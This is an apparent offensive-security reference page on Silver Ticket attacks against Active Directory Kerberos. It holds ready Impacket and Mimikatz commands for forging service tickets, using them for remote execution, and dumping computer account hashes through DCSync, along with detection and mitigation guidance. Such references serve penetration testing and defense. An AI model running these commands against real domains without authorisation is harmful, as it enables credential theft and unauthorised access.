Silver Ticket
Overview
A Silver Ticket is a forged Kerberos TGS (Ticket Granting Service) for a specific service, created using the service account's NTLM hash or AES key. Unlike Golden Tickets which forge TGTs and require the krbtgt hash, Silver Tickets target individual services and require only that service's password hash. Silver Tickets never touch the KDC — the forged ticket is presented directly to the target service, making them harder to detect.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket
Prerequisites
- NTLM hash or AES key of the target service account (often the computer account)
- Domain SID
- SPN of the target service
Techniques
Common Silver Ticket Targets
| Service | SPN Format | Use Case |
|---|---|---|
| CIFS (SMB) | cifs/dc.domain.local |
File share access, PsExec |
| HTTP | http/web.domain.local |
Web application access |
| LDAP | ldap/dc.domain.local |
DCSync |
| HOST | host/dc.domain.local |
Scheduled tasks, WMI |
| MSSQL | MSSQLSvc/db.domain.local:1433 |
Database access |
For services running as the computer account, the computer account's hash is used. The computer account name ends with $ (e.g., DC01$).
Forge Silver Ticket (Impacket)
# Impacket — forge silver ticket for CIFS (SMB access)
# https://github.com/fortra/impacket
impacket-ticketer -nthash <service_ntlm_hash> -domain-sid <domain_sid> -domain <domain> -spn cifs/<target_hostname> Administrator
# Forge for LDAP (can be used for DCSync)
impacket-ticketer -nthash <dc_machine_hash> -domain-sid <domain_sid> -domain <domain> -spn ldap/<dc_hostname> Administrator
# With AES key (stealthier)
impacket-ticketer -aesKey <service_aes256_key> -domain-sid <domain_sid> -domain <domain> -spn cifs/<target_hostname> Administrator
Use the forged ticket:
export KRB5CCNAME=Administrator.ccache
# Impacket
# https://github.com/fortra/impacket
impacket-psexec '<domain>/Administrator@<target_hostname>' -k -no-pass
impacket-smbclient '<domain>/Administrator@<target_hostname>' -k -no-pass
Forge Silver Ticket (Mimikatz)
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Silver ticket for CIFS service (inject into memory)
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /target:<target_hostname> /service:cifs /rc4:<service_ntlm_hash> /ptt
# Silver ticket for HTTP service
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /target:<web_hostname> /service:http /rc4:<service_ntlm_hash> /ptt
# Silver ticket for LDAP (for DCSync)
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /target:<dc_hostname> /service:ldap /rc4:<dc_machine_hash> /ptt
Get Service Account Hash
Computer account hashes can be extracted via:
# Impacket — DCSync for computer account
# https://github.com/fortra/impacket
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user '<computer>$'
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
mimikatz# lsadump::dcsync /domain:<domain> /user:<computer>$
Detection Methods
Network-Based Detection
- TGS presented to a service without a corresponding TGT request to the KDC
- This is the key detection vector — Silver Tickets bypass the KDC entirely
Host-Based Detection
- Windows Security Event 4624 with Kerberos authentication but no corresponding 4768 (TGT request) on the DC
- Service tickets with unusual lifetimes or encryption types
- PAC validation failures (if the service validates the PAC with the KDC)
Mitigation Strategies
- PAC validation — configure services to validate the PAC with the KDC (increases KDC load but detects Silver Tickets)
- Rotate computer account passwords — default rotation is every 30 days; ensure this is not disabled
- Managed Service Accounts — automatic password rotation for service accounts
- AES-only Kerberos — detect RC4-based Silver Tickets